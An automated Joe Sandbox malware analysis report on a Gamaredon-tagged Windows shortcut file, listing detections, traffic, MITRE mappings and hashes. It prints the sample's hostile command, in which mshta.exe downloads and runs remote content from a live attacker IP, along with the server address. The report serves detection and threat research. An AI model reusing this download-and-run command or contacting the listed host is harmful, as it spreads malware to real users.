Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3d#U044f.lnk

Overview

General Information

Sample name:3d#U044f.lnk
renamed because original name is a hash value
Original sample name: . .lnk
Analysis ID:1428420
MD5:c5140207d2276f64b3a8f4ccd3487723
SHA1:4d688086cd47a23444b2329fbd83a3740c40d0ca
SHA256:4102d9b119dd8eb1f4e74ccea7c23fa7fc84d44cb8079abdabbe51629ea25ec4
Tags:aptGamaredonlnk
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Windows shortcut file (LNK) contains suspicious command line arguments
Internet Provider seen in connection with other malware
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6632 cmdline: "C:\Windows\System32\mshta.exe" http://194.180.191.34/pr/relationship.tmp /f MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 3d#U044f.lnkAvira: detected
Multi AV Scanner detection for submitted file
Source: 3d#U044f.lnkReversingLabs: Detection: 23%
Machine Learning detection for sample
Source: 3d#U044f.lnkJoe Sandbox ML: detected
Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
Source: global trafficHTTP traffic detected: GET /pr/relationship.tmp HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 194.180.191.34Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.34
Source: global trafficHTTP traffic detected: GET /pr/relationship.tmp HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 194.180.191.34Connection: Keep-Alive
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp, 3d#U044f.lnkString found in binary or memory: http://194.180.191.34/pr/relationship.tmp
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmp%
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmp...
Source: mshta.exe, 00000000.00000002.2642393986.000001374E870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmp/fternet
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmp1
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmpC:
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmpE
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmpndowsINetCookies
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmpq
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmpvJ
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.180.191.34/pr/relationship.tmpy
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Found URL in windows shortcut file (LNK)
Source: Initial fileStrings: http://194.180.191.34/pr/relationship.tmp
Windows shortcut file (LNK) contains suspicious command line arguments
Source: 3d#U044f.lnkLNK file: http://194.180.191.34/pr/relationship.tmp /f
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.rans.winLNK@1/0@0/1
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\relationship[1].psJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 3d#U044f.lnkReversingLabs: Detection: 23%
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp_
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		1
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
DLL Side-Loading		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager12
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
3d#U044f.lnk24%ReversingLabsShortcut.Trojan.ShortSeek
3d#U044f.lnk100%AviraLNK/Dldr.Agent.VPHZ
3d#U044f.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://194.180.191.34/pr/relationship.tmptrue
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://194.180.191.34/pr/relationship.tmp1mshta.exe, 00000000.00000002.2641916016.000001374E6FE000.00000004.00000020.00020000.00000000.sdmpfalse
      		unknown
      http://194.180.191.34/pr/relationship.tmpqmshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://194.180.191.34/pr/relationship.tmpndowsINetCookiesmshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://194.180.191.34/pr/relationship.tmp%mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            http://194.180.191.34/pr/relationship.tmpEmshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://194.180.191.34/pr/relationship.tmp/fternetmshta.exe, 00000000.00000002.2642393986.000001374E870000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://194.180.191.34/pr/relationship.tmpymshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://194.180.191.34/pr/relationship.tmpvJmshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://194.180.191.34/pr/relationship.tmp...mshta.exe, 00000000.00000002.2641916016.000001374E7B6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://194.180.191.34/pr/relationship.tmpC:mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        194.180.191.34
                        		unknownunknown
                        		39798MIVOCLOUDMDtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1428420
                        Start date and time:2024-04-18 22:48:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:3d#U044f.lnk
                        renamed because original name is a hash value
                        Original Sample Name: . .lnk
                        Detection:MAL
                        Classification:mal76.rans.winLNK@1/0@0/1
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .lnk

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: 3d#U044f.lnk

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        MIVOCLOUDMDkg1aLpgpPi.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        6YHwDFGf9O.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        YZeFXIpII1.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        W7dPx08oeA.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        0A0Lc8FV8m.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        N0wGJewAkm.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        NmhkcWRcsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        r0Div1MfcS.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        HMOmi54a40.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70
                        t42HNtzR7u.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 5.252.177.70

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=98, Archive, ctime=Sun Oct 1 19:50:20 2023, mtime=Sun Oct 1 19:50:20 2023, atime=Mon Jan 1 03:48:41 2018, length=14848, window=hide
                        Entropy (8bit):3.1891995388773204
                        TrID:
                        • Windows Shortcut (20020/1) 100.00%
                        File name:3d#U044f.lnk
                        File size:1'827 bytes
                        MD5:c5140207d2276f64b3a8f4ccd3487723
                        SHA1:4d688086cd47a23444b2329fbd83a3740c40d0ca
                        SHA256:4102d9b119dd8eb1f4e74ccea7c23fa7fc84d44cb8079abdabbe51629ea25ec4
                        SHA512:ac0a2830b6f4bc36901252f1c0dc575f07a24c3194dec822964f59f6f7291e64e23522a8c956afd24de68122b782aa283ce97ef2e4720587feb2bd67a443c210
                        SSDEEP:24:84NUgXnhSSx8Aie1RcNLQO8cS6ce54QZab+mE:8EjDbHSZaq
                        TLSH:E53110243FCA2227E6B98E37500EE701D798750BDA02DF2D42E1408CA875500BC7DDBE
                        File Content Preview:L..................F.... ....v.......v.......x.......:..b...................;....P.O. .:i.....+00.../C:\...................V.1.....BW....Windows.@........H.0BW......(.....................g.7.W.i.n.d.o.w.s.....Z.1......X.<..System32..B........H.0.X.<......

                        File Icon

                        Icon Hash:c2daaaa6a6a9a92d

                        Static Windows Shortcut Info

                        General

                        Relative Path:
                        Command Line Argument:http://194.180.191.34/pr/relationship.tmp /f
                        Icon location:%Windir%\system32\SHELL32.dll

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 18, 2024 22:48:59.275090933 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:48:59.514516115 CEST8049705194.180.191.34192.168.2.8
                        Apr 18, 2024 22:48:59.514955044 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:48:59.514955044 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:48:59.754508018 CEST8049705194.180.191.34192.168.2.8
                        Apr 18, 2024 22:49:00.641921043 CEST8049705194.180.191.34192.168.2.8
                        Apr 18, 2024 22:49:00.642270088 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:49:05.649599075 CEST8049705194.180.191.34192.168.2.8
                        Apr 18, 2024 22:49:05.649676085 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:50:49.237449884 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:50:49.830979109 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:50:51.002893925 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:50:53.346483946 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:50:58.034218073 CEST4970580192.168.2.8194.180.191.34
                        Apr 18, 2024 22:51:07.408987999 CEST4970580192.168.2.8194.180.191.34

                        HTTP Request Dependency Graph

                        • 194.180.191.34

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.849705194.180.191.34806632C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Apr 18, 2024 22:48:59.514955044 CEST337OUTGET /pr/relationship.tmp HTTP/1.1
                        Accept: */*
                        Accept-Language: en-CH
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: 194.180.191.34
                        Connection: Keep-Alive
                        Apr 18, 2024 22:49:00.641921043 CEST201INHTTP/1.1 200 OK
                        Date: Thu, 18 Apr 2024 20:48:59 GMT
                        Server: Apache/2.4.59 (Debian)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/postscript


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:22:48:58
                        Start date:18/04/2024
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\mshta.exe" http://194.180.191.34/pr/relationship.tmp /f
                        Imagebase:0x7ff74d5b0000
                        File size:14'848 bytes
                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:false

                        Disassembly

                        No disassembly